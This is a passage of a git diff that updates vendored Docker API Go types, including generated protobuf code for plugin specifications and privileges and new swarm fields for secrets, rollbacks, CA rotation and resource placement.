+	if len(m.Remote) > 0 {
+		dAtA[i] = 0x12
+		i++
+		i = encodeVarintPlugin(dAtA, i, uint64(len(m.Remote)))
+		i += copy(dAtA[i:], m.Remote)
+	}
+	if len(m.Privileges) > 0 {
+		for _, msg := range m.Privileges {
+			dAtA[i] = 0x1a
+			i++
+			i = encodeVarintPlugin(dAtA, i, uint64(msg.Size()))
+			n, err := msg.MarshalTo(dAtA[i:])
+			if err != nil {
+				return 0, err
+			}
+			i += n
+		}
+	}
+	if m.Disabled {
+		dAtA[i] = 0x20
+		i++
+		if m.Disabled {
+			dAtA[i] = 1
+		} else {
+			dAtA[i] = 0
+		}
+		i++
+	}
+	return i, nil
+}
+
+func (m *PluginPrivilege) Marshal() (dAtA []byte, err error) {
+	size := m.Size()
+	dAtA = make([]byte, size)
+	n, err := m.MarshalTo(dAtA)
+	if err != nil {
+		return nil, err
+	}
+	return dAtA[:n], nil
+}
+
+func (m *PluginPrivilege) MarshalTo(dAtA []byte) (int, error) {
+	var i int
+	_ = i
+	var l int
+	_ = l
+	if len(m.Name) > 0 {
+		dAtA[i] = 0xa
+		i++
+		i = encodeVarintPlugin(dAtA, i, uint64(len(m.Name)))
+		i += copy(dAtA[i:], m.Name)
+	}
+	if len(m.Description) > 0 {
+		dAtA[i] = 0x12
+		i++
+		i = encodeVarintPlugin(dAtA, i, uint64(len(m.Description)))
+		i += copy(dAtA[i:], m.Description)
+	}
+	if len(m.Value) > 0 {
+		for _, s := range m.Value {
+			dAtA[i] = 0x1a
+			i++
+			l = len(s)
+			for l >= 1<<7 {
+				dAtA[i] = uint8(uint64(l)&0x7f | 0x80)
+				l >>= 7
+				i++
+			}
+			dAtA[i] = uint8(l)
+			i++
+			i += copy(dAtA[i:], s)
+		}
+	}
+	return i, nil
+}
+
+func encodeFixed64Plugin(dAtA []byte, offset int, v uint64) int {
+	dAtA[offset] = uint8(v)
+	dAtA[offset+1] = uint8(v >> 8)
+	dAtA[offset+2] = uint8(v >> 16)
+	dAtA[offset+3] = uint8(v >> 24)
+	dAtA[offset+4] = uint8(v >> 32)
+	dAtA[offset+5] = uint8(v >> 40)
+	dAtA[offset+6] = uint8(v >> 48)
+	dAtA[offset+7] = uint8(v >> 56)
+	return offset + 8
+}
+func encodeFixed32Plugin(dAtA []byte, offset int, v uint32) int {
+	dAtA[offset] = uint8(v)
+	dAtA[offset+1] = uint8(v >> 8)
+	dAtA[offset+2] = uint8(v >> 16)
+	dAtA[offset+3] = uint8(v >> 24)
+	return offset + 4
+}
+func encodeVarintPlugin(dAtA []byte, offset int, v uint64) int {
+	for v >= 1<<7 {
+		dAtA[offset] = uint8(v&0x7f | 0x80)
+		v >>= 7
+		offset++
+	}
+	dAtA[offset] = uint8(v)
+	return offset + 1
+}
+func (m *PluginSpec) Size() (n int) {
+	var l int
+	_ = l
+	l = len(m.Name)
+	if l > 0 {
+		n += 1 + l + sovPlugin(uint64(l))
+	}
+	l = len(m.Remote)
+	if l > 0 {
+		n += 1 + l + sovPlugin(uint64(l))
+	}
+	if len(m.Privileges) > 0 {
+		for _, e := range m.Privileges {
+			l = e.Size()
+			n += 1 + l + sovPlugin(uint64(l))
+		}
+	}
+	if m.Disabled {
+		n += 2
+	}
+	return n
+}
+
+func (m *PluginPrivilege) Size() (n int) {
+	var l int
+	_ = l
+	l = len(m.Name)
+	if l > 0 {
+		n += 1 + l + sovPlugin(uint64(l))
+	}
+	l = len(m.Description)
+	if l > 0 {
+		n += 1 + l + sovPlugin(uint64(l))
+	}
+	if len(m.Value) > 0 {
+		for _, s := range m.Value {
+			l = len(s)
+			n += 1 + l + sovPlugin(uint64(l))
+		}
+	}
+	return n
+}
+
+func sovPlugin(x uint64) (n int) {
+	for {
+		n++
+		x >>= 7
+		if x == 0 {
+			break
+		}
+	}
+	return n
+}
+func sozPlugin(x uint64) (n int) {
+	return sovPlugin(uint64((x << 1) ^ uint64((int64(x) >> 63))))
+}
+func (m *PluginSpec) Unmarshal(dAtA []byte) error {
+	l := len(dAtA)
+	iNdEx := 0
+	for iNdEx < l {
+		preIndex := iNdEx
+		var wire uint64
+		for shift := uint(0); ; shift += 7 {
+			if shift >= 64 {
+				return ErrIntOverflowPlugin
+			}
+			if iNdEx >= l {
+				return io.ErrUnexpectedEOF
+			}
+			b := dAtA[iNdEx]
+			iNdEx++
+			wire |= (uint64(b) & 0x7F) << shift
+			if b < 0x80 {
+				break
+			}
+		}
+		fieldNum := int32(wire >> 3)
+		wireType := int(wire & 0x7)
+		if wireType == 4 {
+			return fmt.Errorf("proto: PluginSpec: wiretype end group for non-group")
+		}
+		if fieldNum <= 0 {
+			return fmt.Errorf("proto: PluginSpec: illegal tag %d (wire type %d)", fieldNum, wire)
+		}
+		switch fieldNum {
+		case 1:
+			if wireType != 2 {
+				return fmt.Errorf("proto: wrong wireType = %d for field Name", wireType)
+			}
+			var stringLen uint64
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return ErrIntOverflowPlugin
+				}
+				if iNdEx >= l {
+					return io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				stringLen |= (uint64(b) & 0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			intStringLen := int(stringLen)
+			if intStringLen < 0 {
+				return ErrInvalidLengthPlugin
+			}
+			postIndex := iNdEx + intStringLen
+			if postIndex > l {
+				return io.ErrUnexpectedEOF
+			}
+			m.Name = string(dAtA[iNdEx:postIndex])
+			iNdEx = postIndex
+		case 2:
+			if wireType != 2 {
+				return fmt.Errorf("proto: wrong wireType = %d for field Remote", wireType)
+			}
+			var stringLen uint64
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return ErrIntOverflowPlugin
+				}
+				if iNdEx >= l {
+					return io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				stringLen |= (uint64(b) & 0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			intStringLen := int(stringLen)
+			if intStringLen < 0 {
+				return ErrInvalidLengthPlugin
+			}
+			postIndex := iNdEx + intStringLen
+			if postIndex > l {
+				return io.ErrUnexpectedEOF
+			}
+			m.Remote = string(dAtA[iNdEx:postIndex])
+			iNdEx = postIndex
+		case 3:
+			if wireType != 2 {
+				return fmt.Errorf("proto: wrong wireType = %d for field Privileges", wireType)
+			}
+			var msglen int
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return ErrIntOverflowPlugin
+				}
+				if iNdEx >= l {
+					return io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				msglen |= (int(b) & 0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			if msglen < 0 {
+				return ErrInvalidLengthPlugin
+			}
+			postIndex := iNdEx + msglen
+			if postIndex > l {
+				return io.ErrUnexpectedEOF
+			}
+			m.Privileges = append(m.Privileges, &PluginPrivilege{})
+			if err := m.Privileges[len(m.Privileges)-1].Unmarshal(dAtA[iNdEx:postIndex]); err != nil {
+				return err
+			}
+			iNdEx = postIndex
+		case 4:
+			if wireType != 0 {
+				return fmt.Errorf("proto: wrong wireType = %d for field Disabled", wireType)
+			}
+			var v int
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return ErrIntOverflowPlugin
+				}
+				if iNdEx >= l {
+					return io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				v |= (int(b) & 0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			m.Disabled = bool(v != 0)
+		default:
+			iNdEx = preIndex
+			skippy, err := skipPlugin(dAtA[iNdEx:])
+			if err != nil {
+				return err
+			}
+			if skippy < 0 {
+				return ErrInvalidLengthPlugin
+			}
+			if (iNdEx + skippy) > l {
+				return io.ErrUnexpectedEOF
+			}
+			iNdEx += skippy
+		}
+	}
+
+	if iNdEx > l {
+		return io.ErrUnexpectedEOF
+	}
+	return nil
+}
+func (m *PluginPrivilege) Unmarshal(dAtA []byte) error {
+	l := len(dAtA)
+	iNdEx := 0
+	for iNdEx < l {
+		preIndex := iNdEx
+		var wire uint64
+		for shift := uint(0); ; shift += 7 {
+			if shift >= 64 {
+				return ErrIntOverflowPlugin
+			}
+			if iNdEx >= l {
+				return io.ErrUnexpectedEOF
+			}
+			b := dAtA[iNdEx]
+			iNdEx++
+			wire |= (uint64(b) & 0x7F) << shift
+			if b < 0x80 {
+				break
+			}
+		}
+		fieldNum := int32(wire >> 3)
+		wireType := int(wire & 0x7)
+		if wireType == 4 {
+			return fmt.Errorf("proto: PluginPrivilege: wiretype end group for non-group")
+		}
+		if fieldNum <= 0 {
+			return fmt.Errorf("proto: PluginPrivilege: illegal tag %d (wire type %d)", fieldNum, wire)
+		}
+		switch fieldNum {
+		case 1:
+			if wireType != 2 {
+				return fmt.Errorf("proto: wrong wireType = %d for field Name", wireType)
+			}
+			var stringLen uint64
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return ErrIntOverflowPlugin
+				}
+				if iNdEx >= l {
+					return io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				stringLen |= (uint64(b) & 0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			intStringLen := int(stringLen)
+			if intStringLen < 0 {
+				return ErrInvalidLengthPlugin
+			}
+			postIndex := iNdEx + intStringLen
+			if postIndex > l {
+				return io.ErrUnexpectedEOF
+			}
+			m.Name = string(dAtA[iNdEx:postIndex])
+			iNdEx = postIndex
+		case 2:
+			if wireType != 2 {
+				return fmt.Errorf("proto: wrong wireType = %d for field Description", wireType)
+			}
+			var stringLen uint64
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return ErrIntOverflowPlugin
+				}
+				if iNdEx >= l {
+					return io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				stringLen |= (uint64(b) & 0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			intStringLen := int(stringLen)
+			if intStringLen < 0 {
+				return ErrInvalidLengthPlugin
+			}
+			postIndex := iNdEx + intStringLen
+			if postIndex > l {
+				return io.ErrUnexpectedEOF
+			}
+			m.Description = string(dAtA[iNdEx:postIndex])
+			iNdEx = postIndex
+		case 3:
+			if wireType != 2 {
+				return fmt.Errorf("proto: wrong wireType = %d for field Value", wireType)
+			}
+			var stringLen uint64
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return ErrIntOverflowPlugin
+				}
+				if iNdEx >= l {
+					return io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				stringLen |= (uint64(b) & 0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			intStringLen := int(stringLen)
+			if intStringLen < 0 {
+				return ErrInvalidLengthPlugin
+			}
+			postIndex := iNdEx + intStringLen
+			if postIndex > l {
+				return io.ErrUnexpectedEOF
+			}
+			m.Value = append(m.Value, string(dAtA[iNdEx:postIndex]))
+			iNdEx = postIndex
+		default:
+			iNdEx = preIndex
+			skippy, err := skipPlugin(dAtA[iNdEx:])
+			if err != nil {
+				return err
+			}
+			if skippy < 0 {
+				return ErrInvalidLengthPlugin
+			}
+			if (iNdEx + skippy) > l {
+				return io.ErrUnexpectedEOF
+			}
+			iNdEx += skippy
+		}
+	}
+
+	if iNdEx > l {
+		return io.ErrUnexpectedEOF
+	}
+	return nil
+}
+func skipPlugin(dAtA []byte) (n int, err error) {
+	l := len(dAtA)
+	iNdEx := 0
+	for iNdEx < l {
+		var wire uint64
+		for shift := uint(0); ; shift += 7 {
+			if shift >= 64 {
+				return 0, ErrIntOverflowPlugin
+			}
+			if iNdEx >= l {
+				return 0, io.ErrUnexpectedEOF
+			}
+			b := dAtA[iNdEx]
+			iNdEx++
+			wire |= (uint64(b) & 0x7F) << shift
+			if b < 0x80 {
+				break
+			}
+		}
+		wireType := int(wire & 0x7)
+		switch wireType {
+		case 0:
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return 0, ErrIntOverflowPlugin
+				}
+				if iNdEx >= l {
+					return 0, io.ErrUnexpectedEOF
+				}
+				iNdEx++
+				if dAtA[iNdEx-1] < 0x80 {
+					break
+				}
+			}
+			return iNdEx, nil
+		case 1:
+			iNdEx += 8
+			return iNdEx, nil
+		case 2:
+			var length int
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return 0, ErrIntOverflowPlugin
+				}
+				if iNdEx >= l {
+					return 0, io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				length |= (int(b) & 0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			iNdEx += length
+			if length < 0 {
+				return 0, ErrInvalidLengthPlugin
+			}
+			return iNdEx, nil
+		case 3:
+			for {
+				var innerWire uint64
+				var start int = iNdEx
+				for shift := uint(0); ; shift += 7 {
+					if shift >= 64 {
+						return 0, ErrIntOverflowPlugin
+					}
+					if iNdEx >= l {
+						return 0, io.ErrUnexpectedEOF
+					}
+					b := dAtA[iNdEx]
+					iNdEx++
+					innerWire |= (uint64(b) & 0x7F) << shift
+					if b < 0x80 {
+						break
+					}
+				}
+				innerWireType := int(innerWire & 0x7)
+				if innerWireType == 4 {
+					break
+				}
+				next, err := skipPlugin(dAtA[start:])
+				if err != nil {
+					return 0, err
+				}
+				iNdEx = start + next
+			}
+			return iNdEx, nil
+		case 4:
+			return iNdEx, nil
+		case 5:
+			iNdEx += 4
+			return iNdEx, nil
+		default:
+			return 0, fmt.Errorf("proto: illegal wireType %d", wireType)
+		}
+	}
+	panic("unreachable")
+}
+
+var (
+	ErrInvalidLengthPlugin = fmt.Errorf("proto: negative length found during unmarshaling")
+	ErrIntOverflowPlugin   = fmt.Errorf("proto: integer overflow")
+)
+
+func init() { proto.RegisterFile("plugin.proto", fileDescriptorPlugin) }
+
+var fileDescriptorPlugin = []byte{
+	// 196 bytes of a gzipped FileDescriptorProto
+	0x1f, 0x8b, 0x08, 0x00, 0x00, 0x09, 0x6e, 0x88, 0x02, 0xff, 0xe2, 0xe2, 0x29, 0xc8, 0x29, 0x4d,
+	0xcf, 0xcc, 0xd3, 0x2b, 0x28, 0xca, 0x2f, 0xc9, 0x57, 0x6a, 0x63, 0xe4, 0xe2, 0x0a, 0x00, 0x0b,
+	0x04, 0x17, 0xa4, 0x26, 0x0b, 0x09, 0x71, 0xb1, 0xe4, 0x25, 0xe6, 0xa6, 0x4a, 0x30, 0x2a, 0x30,
+	0x6a, 0x70, 0x06, 0x81, 0xd9, 0x42, 0x62, 0x5c, 0x6c, 0x45, 0xa9, 0xb9, 0xf9, 0x25, 0xa9, 0x12,
+	0x4c, 0x60, 0x51, 0x28, 0x4f, 0xc8, 0x80, 0x8b, 0xab, 0xa0, 0x28, 0xb3, 0x2c, 0x33, 0x27, 0x35,
+	0x3d, 0xb5, 0x58, 0x82, 0x59, 0x81, 0x59, 0x83, 0xdb, 0x48, 0x40, 0x0f, 0x62, 0x58, 0x00, 0x4c,
+	0x22, 0x08, 0x49, 0x8d, 0x90, 0x14, 0x17, 0x47, 0x4a, 0x66, 0x71, 0x62, 0x52, 0x4e, 0x6a, 0x8a,
+	0x04, 0x8b, 0x02, 0xa3, 0x06, 0x47, 0x10, 0x9c, 0xaf, 0x14, 0xcb, 0xc5, 0x8f, 0xa6, 0x15, 0xab,
+	0x63, 0x14, 0xb8, 0xb8, 0x53, 0x52, 0x8b, 0x93, 0x8b, 0x32, 0x0b, 0x4a, 0x32, 0xf3, 0xf3, 0xa0,
+	0x2e, 0x42, 0x16, 0x12, 0x12, 0xe1, 0x62, 0x2d, 0x4b, 0xcc, 0x29, 0x4d, 0x05, 0xbb, 0x88, 0x33,
+	0x08, 0xc2, 0x71, 0xe2, 0x39, 0xf1, 0x48, 0x8e, 0xf1, 0xc2, 0x23, 0x39, 0xc6, 0x07, 0x8f, 0xe4,
+	0x18, 0x93, 0xd8, 0xc0, 0x9e, 0x37, 0x06, 0x04, 0x00, 0x00, 0xff, 0xff, 0xb8, 0x84, 0xad, 0x79,
+	0x0c, 0x01, 0x00, 0x00,
+}
diff --git a/vendor/github.com/docker/docker/api/types/swarm/runtime/plugin.proto b/vendor/github.com/docker/docker/api/types/swarm/runtime/plugin.proto
new file mode 100644
index 0000000000..6d63b7783f
--- /dev/null
+++ b/vendor/github.com/docker/docker/api/types/swarm/runtime/plugin.proto
@@ -0,0 +1,20 @@
+syntax = "proto3";
+
+option go_package = "github.com/docker/docker/api/types/swarm/runtime;runtime";
+
+// PluginSpec defines the base payload which clients can specify for creating
+// a service with the plugin runtime.
+message PluginSpec {
+	string name = 1;
+	string remote = 2;
+	repeated PluginPrivilege privileges = 3;
+	bool disabled = 4;
+}
+
+// PluginPrivilege describes a permission the user has to accept
+// upon installing a plugin.
+message PluginPrivilege {
+	string name = 1;
+	string description = 2;
+	repeated string value = 3;
+}
diff --git a/vendor/github.com/docker/docker/api/types/swarm/secret.go b/vendor/github.com/docker/docker/api/types/swarm/secret.go
index fdb2388888..d5213ec981 100644
--- a/vendor/github.com/docker/docker/api/types/swarm/secret.go
+++ b/vendor/github.com/docker/docker/api/types/swarm/secret.go
@@ -1,4 +1,4 @@
-package swarm
+package swarm // import "github.com/docker/docker/api/types/swarm"
 
 import "os"
 
@@ -12,7 +12,12 @@ type Secret struct {
 // SecretSpec represents a secret specification from a secret in swarm
 type SecretSpec struct {
 	Annotations
-	Data []byte `json:",omitempty"`
+	Data   []byte  `json:",omitempty"`
+	Driver *Driver `json:",omitempty"` // name of the secrets driver used to fetch the secret's value from an external secret store
+
+	// Templating controls whether and how to evaluate the secret payload as
+	// a template. If it is not set, no templating is used.
+	Templating *Driver `json:",omitempty"`
 }
 
 // SecretReferenceFileTarget is a file target in a secret reference
diff --git a/vendor/github.com/docker/docker/api/types/swarm/service.go b/vendor/github.com/docker/docker/api/types/swarm/service.go
index 2cf2642c1f..abf192e759 100644
--- a/vendor/github.com/docker/docker/api/types/swarm/service.go
+++ b/vendor/github.com/docker/docker/api/types/swarm/service.go
@@ -1,4 +1,4 @@
-package swarm
+package swarm // import "github.com/docker/docker/api/types/swarm"
 
 import "time"
 
@@ -6,10 +6,10 @@ import "time"
 type Service struct {
 	ID string
 	Meta
-	Spec         ServiceSpec  `json:",omitempty"`
-	PreviousSpec *ServiceSpec `json:",omitempty"`
-	Endpoint     Endpoint     `json:",omitempty"`
-	UpdateStatus UpdateStatus `json:",omitempty"`
+	Spec         ServiceSpec   `json:",omitempty"`
+	PreviousSpec *ServiceSpec  `json:",omitempty"`
+	Endpoint     Endpoint      `json:",omitempty"`
+	UpdateStatus *UpdateStatus `json:",omitempty"`
 }
 
 // ServiceSpec represents the spec of a service.
@@ -18,9 +18,10 @@ type ServiceSpec struct {
 
 	// TaskTemplate defines how the service should construct new tasks when
 	// orchestrating this service.
-	TaskTemplate TaskSpec      `json:",omitempty"`
-	Mode         ServiceMode   `json:",omitempty"`
-	UpdateConfig *UpdateConfig `json:",omitempty"`
+	TaskTemplate   TaskSpec      `json:",omitempty"`
+	Mode           ServiceMode   `json:",omitempty"`
+	UpdateConfig   *UpdateConfig `json:",omitempty"`
+	RollbackConfig *UpdateConfig `json:",omitempty"`
 
 	// Networks field in ServiceSpec is deprecated. The
 	// same field in TaskSpec should be used instead.
@@ -45,13 +46,19 @@ const (
 	UpdateStatePaused UpdateState = "paused"
 	// UpdateStateCompleted is the completed state.
 	UpdateStateCompleted UpdateState = "completed"
+	// UpdateStateRollbackStarted is the state with a rollback in progress.
+	UpdateStateRollbackStarted UpdateState = "rollback_started"
+	// UpdateStateRollbackPaused is the state with a rollback in progress.
+	UpdateStateRollbackPaused UpdateState = "rollback_paused"
+	// UpdateStateRollbackCompleted is the state with a rollback in progress.
+	UpdateStateRollbackCompleted UpdateState = "rollback_completed"
 )
 
 // UpdateStatus reports the status of a service update.
 type UpdateStatus struct {
 	State       UpdateState `json:",omitempty"`
-	StartedAt   time.Time   `json:",omitempty"`
-	CompletedAt time.Time   `json:",omitempty"`
+	StartedAt   *time.Time  `json:",omitempty"`
+	CompletedAt *time.Time  `json:",omitempty"`
 	Message     string      `json:",omitempty"`
 }
 
@@ -68,6 +75,13 @@ const (
 	UpdateFailureActionPause = "pause"
 	// UpdateFailureActionContinue CONTINUE
 	UpdateFailureActionContinue = "continue"
+	// UpdateFailureActionRollback ROLLBACK
+	UpdateFailureActionRollback = "rollback"
+
+	// UpdateOrderStopFirst STOP_FIRST
+	UpdateOrderStopFirst = "stop-first"
+	// UpdateOrderStartFirst START_FIRST
+	UpdateOrderStartFirst = "start-first"
 )
 
 // UpdateConfig represents the update configuration.
@@ -102,4 +116,9 @@ type UpdateConfig struct {
 	// If the failure action is PAUSE, no more tasks will be updated until
 	// another update is started.
 	MaxFailureRatio float32
+
+	// Order indicates the order of operations when rolling out an updated
+	// task. Either the old task is shut down before the new task is
+	// started, or the new task is started before the old task is shut down.
+	Order string
 }
diff --git a/vendor/github.com/docker/docker/api/types/swarm/swarm.go b/vendor/github.com/docker/docker/api/types/swarm/swarm.go
index 0b42219696..1b111d725b 100644
--- a/vendor/github.com/docker/docker/api/types/swarm/swarm.go
+++ b/vendor/github.com/docker/docker/api/types/swarm/swarm.go
@@ -1,13 +1,15 @@
-package swarm
+package swarm // import "github.com/docker/docker/api/types/swarm"
 
 import "time"
 
-// ClusterInfo represents info about the cluster for outputing in "info"
+// ClusterInfo represents info about the cluster for outputting in "info"
 // it contains the same information as "Swarm", but without the JoinTokens
 type ClusterInfo struct {
 	ID string
 	Meta
-	Spec Spec
+	Spec                   Spec
+	TLSInfo                TLSInfo
+	RootRotationInProgress bool
 }
 
 // Swarm represents a swarm.
@@ -107,6 +109,16 @@ type CAConfig struct {
 	// ExternalCAs is a list of CAs to which a manager node will make
 	// certificate signing requests for node certificates.
 	ExternalCAs []*ExternalCA `json:",omitempty"`
+
+	// SigningCACert and SigningCAKey specify the desired signing root CA and
+	// root CA key for the swarm.  When inspecting the cluster, the key will
+	// be redacted.
+	SigningCACert string `json:",omitempty"`
+	SigningCAKey  string `json:",omitempty"`
+
+	// If this value changes, and there is no specified signing cert and key,
+	// then the swarm is forced to generate a new root certificate ane key.
+	ForceRotate uint64 `json:",omitempty"`
 }
 
 // ExternalCAProtocol represents type of external CA.
@@ -126,23 +138,31 @@ type ExternalCA struct {
 	// Options is a set of additional key/value pairs whose interpretation
 	// depends on the specified CA type.
 	Options map[string]string `json:",omitempty"`
+
+	// CACert specifies which root CA is used by this external CA.  This certificate must
+	// be in PEM format.
+	CACert string
 }
 
 // InitRequest is the request used to init a swarm.
 type InitRequest struct {
 	ListenAddr       string
 	AdvertiseAddr    string
+	DataPathAddr     string
 	ForceNewCluster  bool
 	Spec             Spec
 	AutoLockManagers bool
+	Availability     NodeAvailability
 }
 
 // JoinRequest is the request used to join a swarm.
 type JoinRequest struct {
 	ListenAddr    string
 	AdvertiseAddr string
+	DataPathAddr  string
 	RemoteAddrs   []string
 	JoinToken     string // accept by secret
+	Availability  NodeAvailability
 }
 
 // UnlockRequest is the request used to unlock a swarm.
@@ -177,10 +197,10 @@ type Info struct {
 	Error            string
 
 	RemoteManagers []Peer
-	Nodes          int
-	Managers       int
+	Nodes          int `json:",omitempty"`
+	Managers       int `json:",omitempty"`
 
-	Cluster ClusterInfo
+	Cluster *ClusterInfo `json:",omitempty"`
 }
 
 // Peer represents a peer.
diff --git a/vendor/github.com/docker/docker/api/types/swarm/task.go b/vendor/github.com/docker/docker/api/types/swarm/task.go
index ace12cc89f..b35605d12f 100644
--- a/vendor/github.com/docker/docker/api/types/swarm/task.go
+++ b/vendor/github.com/docker/docker/api/types/swarm/task.go
@@ -1,6 +1,10 @@
-package swarm
+package swarm // import "github.com/docker/docker/api/types/swarm"
 
-import "time"
+import (
+	"time"
+
+	"github.com/docker/docker/api/types/swarm/runtime"
+)
 
 // TaskState represents the state of a task.
 type TaskState string
@@ -32,6 +36,10 @@ const (
 	TaskStateFailed TaskState = "failed"
 	// TaskStateRejected REJECTED
 	TaskStateRejected TaskState = "rejected"
+	// TaskStateRemove REMOVE
+	TaskStateRemove TaskState = "remove"
+	// TaskStateOrphaned ORPHANED
+	TaskStateOrphaned TaskState = "orphaned"
 )
 
 // Task represents a task.
@@ -47,11 +55,19 @@ type Task struct {
 	Status              TaskStatus          `json:",omitempty"`
 	DesiredState        TaskState           `json:",omitempty"`
 	NetworksAttachments []NetworkAttachment `json:",omitempty"`
+	GenericResources    []GenericResource   `json:",omitempty"`
 }
 
 // TaskSpec represents the spec of a task.
 type TaskSpec struct {
-	ContainerSpec ContainerSpec             `json:",omitempty"`
+	// ContainerSpec, NetworkAttachmentSpec, and PluginSpec are mutually exclusive.
+	// PluginSpec is only used when the `Runtime` field is set to `plugin`
+	// NetworkAttachmentSpec is used if the `Runtime` field is set to
+	// `attachment`.
+	ContainerSpec         *ContainerSpec         `json:",omitempty"`
+	PluginSpec            *runtime.PluginSpec    `json:",omitempty"`
+	NetworkAttachmentSpec *NetworkAttachmentSpec `json:",omitempty"`
+
 	Resources     *ResourceRequirements     `json:",omitempty"`
 	RestartPolicy *RestartPolicy            `json:",omitempty"`
 	Placement     *Placement                `json:",omitempty"`
@@ -65,12 +81,40 @@ type TaskSpec struct {
 	// ForceUpdate is a counter that triggers an update even if no relevant
 	// parameters have been changed.
 	ForceUpdate uint64
+
+	Runtime RuntimeType `json:",omitempty"`
 }
 
 // Resources represents resources (CPU/Memory).
 type Resources struct {
-	NanoCPUs    int64 `json:",omitempty"`
-	MemoryBytes int64 `json:",omitempty"`
+	NanoCPUs         int64             `json:",omitempty"`
+	MemoryBytes      int64             `json:",omitempty"`
+	GenericResources []GenericResource `json:",omitempty"`
+}
+
+// GenericResource represents a "user defined" resource which can
+// be either an integer (e.g: SSD=3) or a string (e.g: SSD=sda1)
+type GenericResource struct {
+	NamedResourceSpec    *NamedGenericResource    `json:",omitempty"`
+	DiscreteResourceSpec *DiscreteGenericResource `json:",omitempty"`
+}
+
+// NamedGenericResource represents a "user defined" resource which is defined
+// as a string.
+// "Kind" is used to describe the Kind of a resource (e.g: "GPU", "FPGA", "SSD", ...)
+// Value is used to identify the resource (GPU="UUID-1", FPGA="/dev/sdb5", ...)
+type NamedGenericResource struct {
+	Kind  string `json:",omitempty"`
+	Value string `json:",omitempty"`
+}
+
+// DiscreteGenericResource represents a "user defined" resource which is defined
+// as an integer
+// "Kind" is used to describe the Kind of a resource (e.g: "GPU", "FPGA", "SSD", ...)
+// Value is used to count the resource (SSD=5, HDD=3, ...)
+type DiscreteGenericResource struct {
+	Kind  string `json:",omitempty"`
+	Value int64  `json:",omitempty"`
 }
 
 // ResourceRequirements represents resources requirements.
@@ -81,7 +125,26 @@ type ResourceRequirements struct {
 
 // Placement represents orchestration parameters.
 type Placement struct {
-	Constraints []string `json:",omitempty"`
+	Constraints []string              `json:",omitempty"`
+	Preferences []PlacementPreference `json:",omitempty"`
+
+	// Platforms stores all the platforms that the image can run on.
+	// This field is used in the platform filter for scheduling. If empty,
+	// then the platform filter is off, meaning there are no scheduling restrictions.
+	Platforms []Platform `json:",omitempty"`
+}
+
+// PlacementPreference provides a way to make the scheduler aware of factors
+// such as topology.
+type PlacementPreference struct {
+	Spread *SpreadOver
+}
+
+// SpreadOver is a scheduling preference that instructs the scheduler to spread
+// tasks evenly over groups of nodes identified by labels.
+type SpreadOver struct {
+	// label descriptor, such as engine.labels.az
+	SpreadDescriptor string
 }
 
 // RestartPolicy represents the restart policy.
@@ -106,19 +169,19 @@ const (
 
 // TaskStatus represents the status of a task.
 type TaskStatus struct {
-	Timestamp       time.Time       `json:",omitempty"`
-	State           TaskState       `json:",omitempty"`
-	Message         string          `json:",omitempty"`
-	Err             string          `json:",omitempty"`
-	ContainerStatus ContainerStatus `json:",omitempty"`
-	PortStatus      PortStatus      `json:",omitempty"`
+	Timestamp       time.Time        `json:",omitempty"`
+	State           TaskState        `json:",omitempty"`
+	Message         string           `json:",omitempty"`
+	Err             string           `json:",omitempty"`
+	ContainerStatus *ContainerStatus `json:",omitempty"`
+	PortStatus      PortStatus       `json:",omitempty"`
 }
 
 // ContainerStatus represents the status of a container.
 type ContainerStatus struct {
-	ContainerID string `json:",omitempty"`
-	PID         int    `json:",omitempty"`
-	ExitCode    int    `json:",omitempty"`
+	ContainerID string
+	PID         int
+	ExitCode    int
 }
 
 // PortStatus represents the port status of a task's host ports whose
diff --git a/vendor/github.com/docker/docker/api/types/time/duration_convert.go b/vendor/github.com/docker/docker/api/types/time/duration_convert.go
index 63e1eec19e..84b6f07322 100644
--- a/vendor/github.com/docker/docker/api/types/time/duration_convert.go
+++ b/vendor/github.com/docker/docker/api/types/time/duration_convert.go
@@ -1,4 +1,4 @@
-package time
+package time // import "github.com/docker/docker/api/types/time"
 
 import (
 	"strconv"
diff --git a/vendor/github.com/docker/docker/api/types/time/duration_convert_test.go b/vendor/github.com/docker/docker/api/types/time/duration_convert_test.go
index 869c08f863..a23be94776 100644
--- a/vendor/github.com/docker/docker/api/types/time/duration_convert_test.go
+++ b/vendor/github.com/docker/docker/api/types/time/duration_convert_test.go
@@ -1,4 +1,4 @@
-package time
+package time // import "github.com/docker/docker/api/types/time"
 
 import (
 	"testing"
diff --git a/vendor/github.com/docker/docker/api/types/time/timestamp.go b/vendor/github.com/docker/docker/api/types/time/timestamp.go
index d3695ba723..ea3495efeb 100644
--- a/vendor/github.com/docker/docker/api/types/time/timestamp.go
+++ b/vendor/github.com/docker/docker/api/types/time/timestamp.go
@@ -1,4 +1,4 @@
-package time
+package time // import "github.com/docker/docker/api/types/time"
 
 import (
 	"fmt"
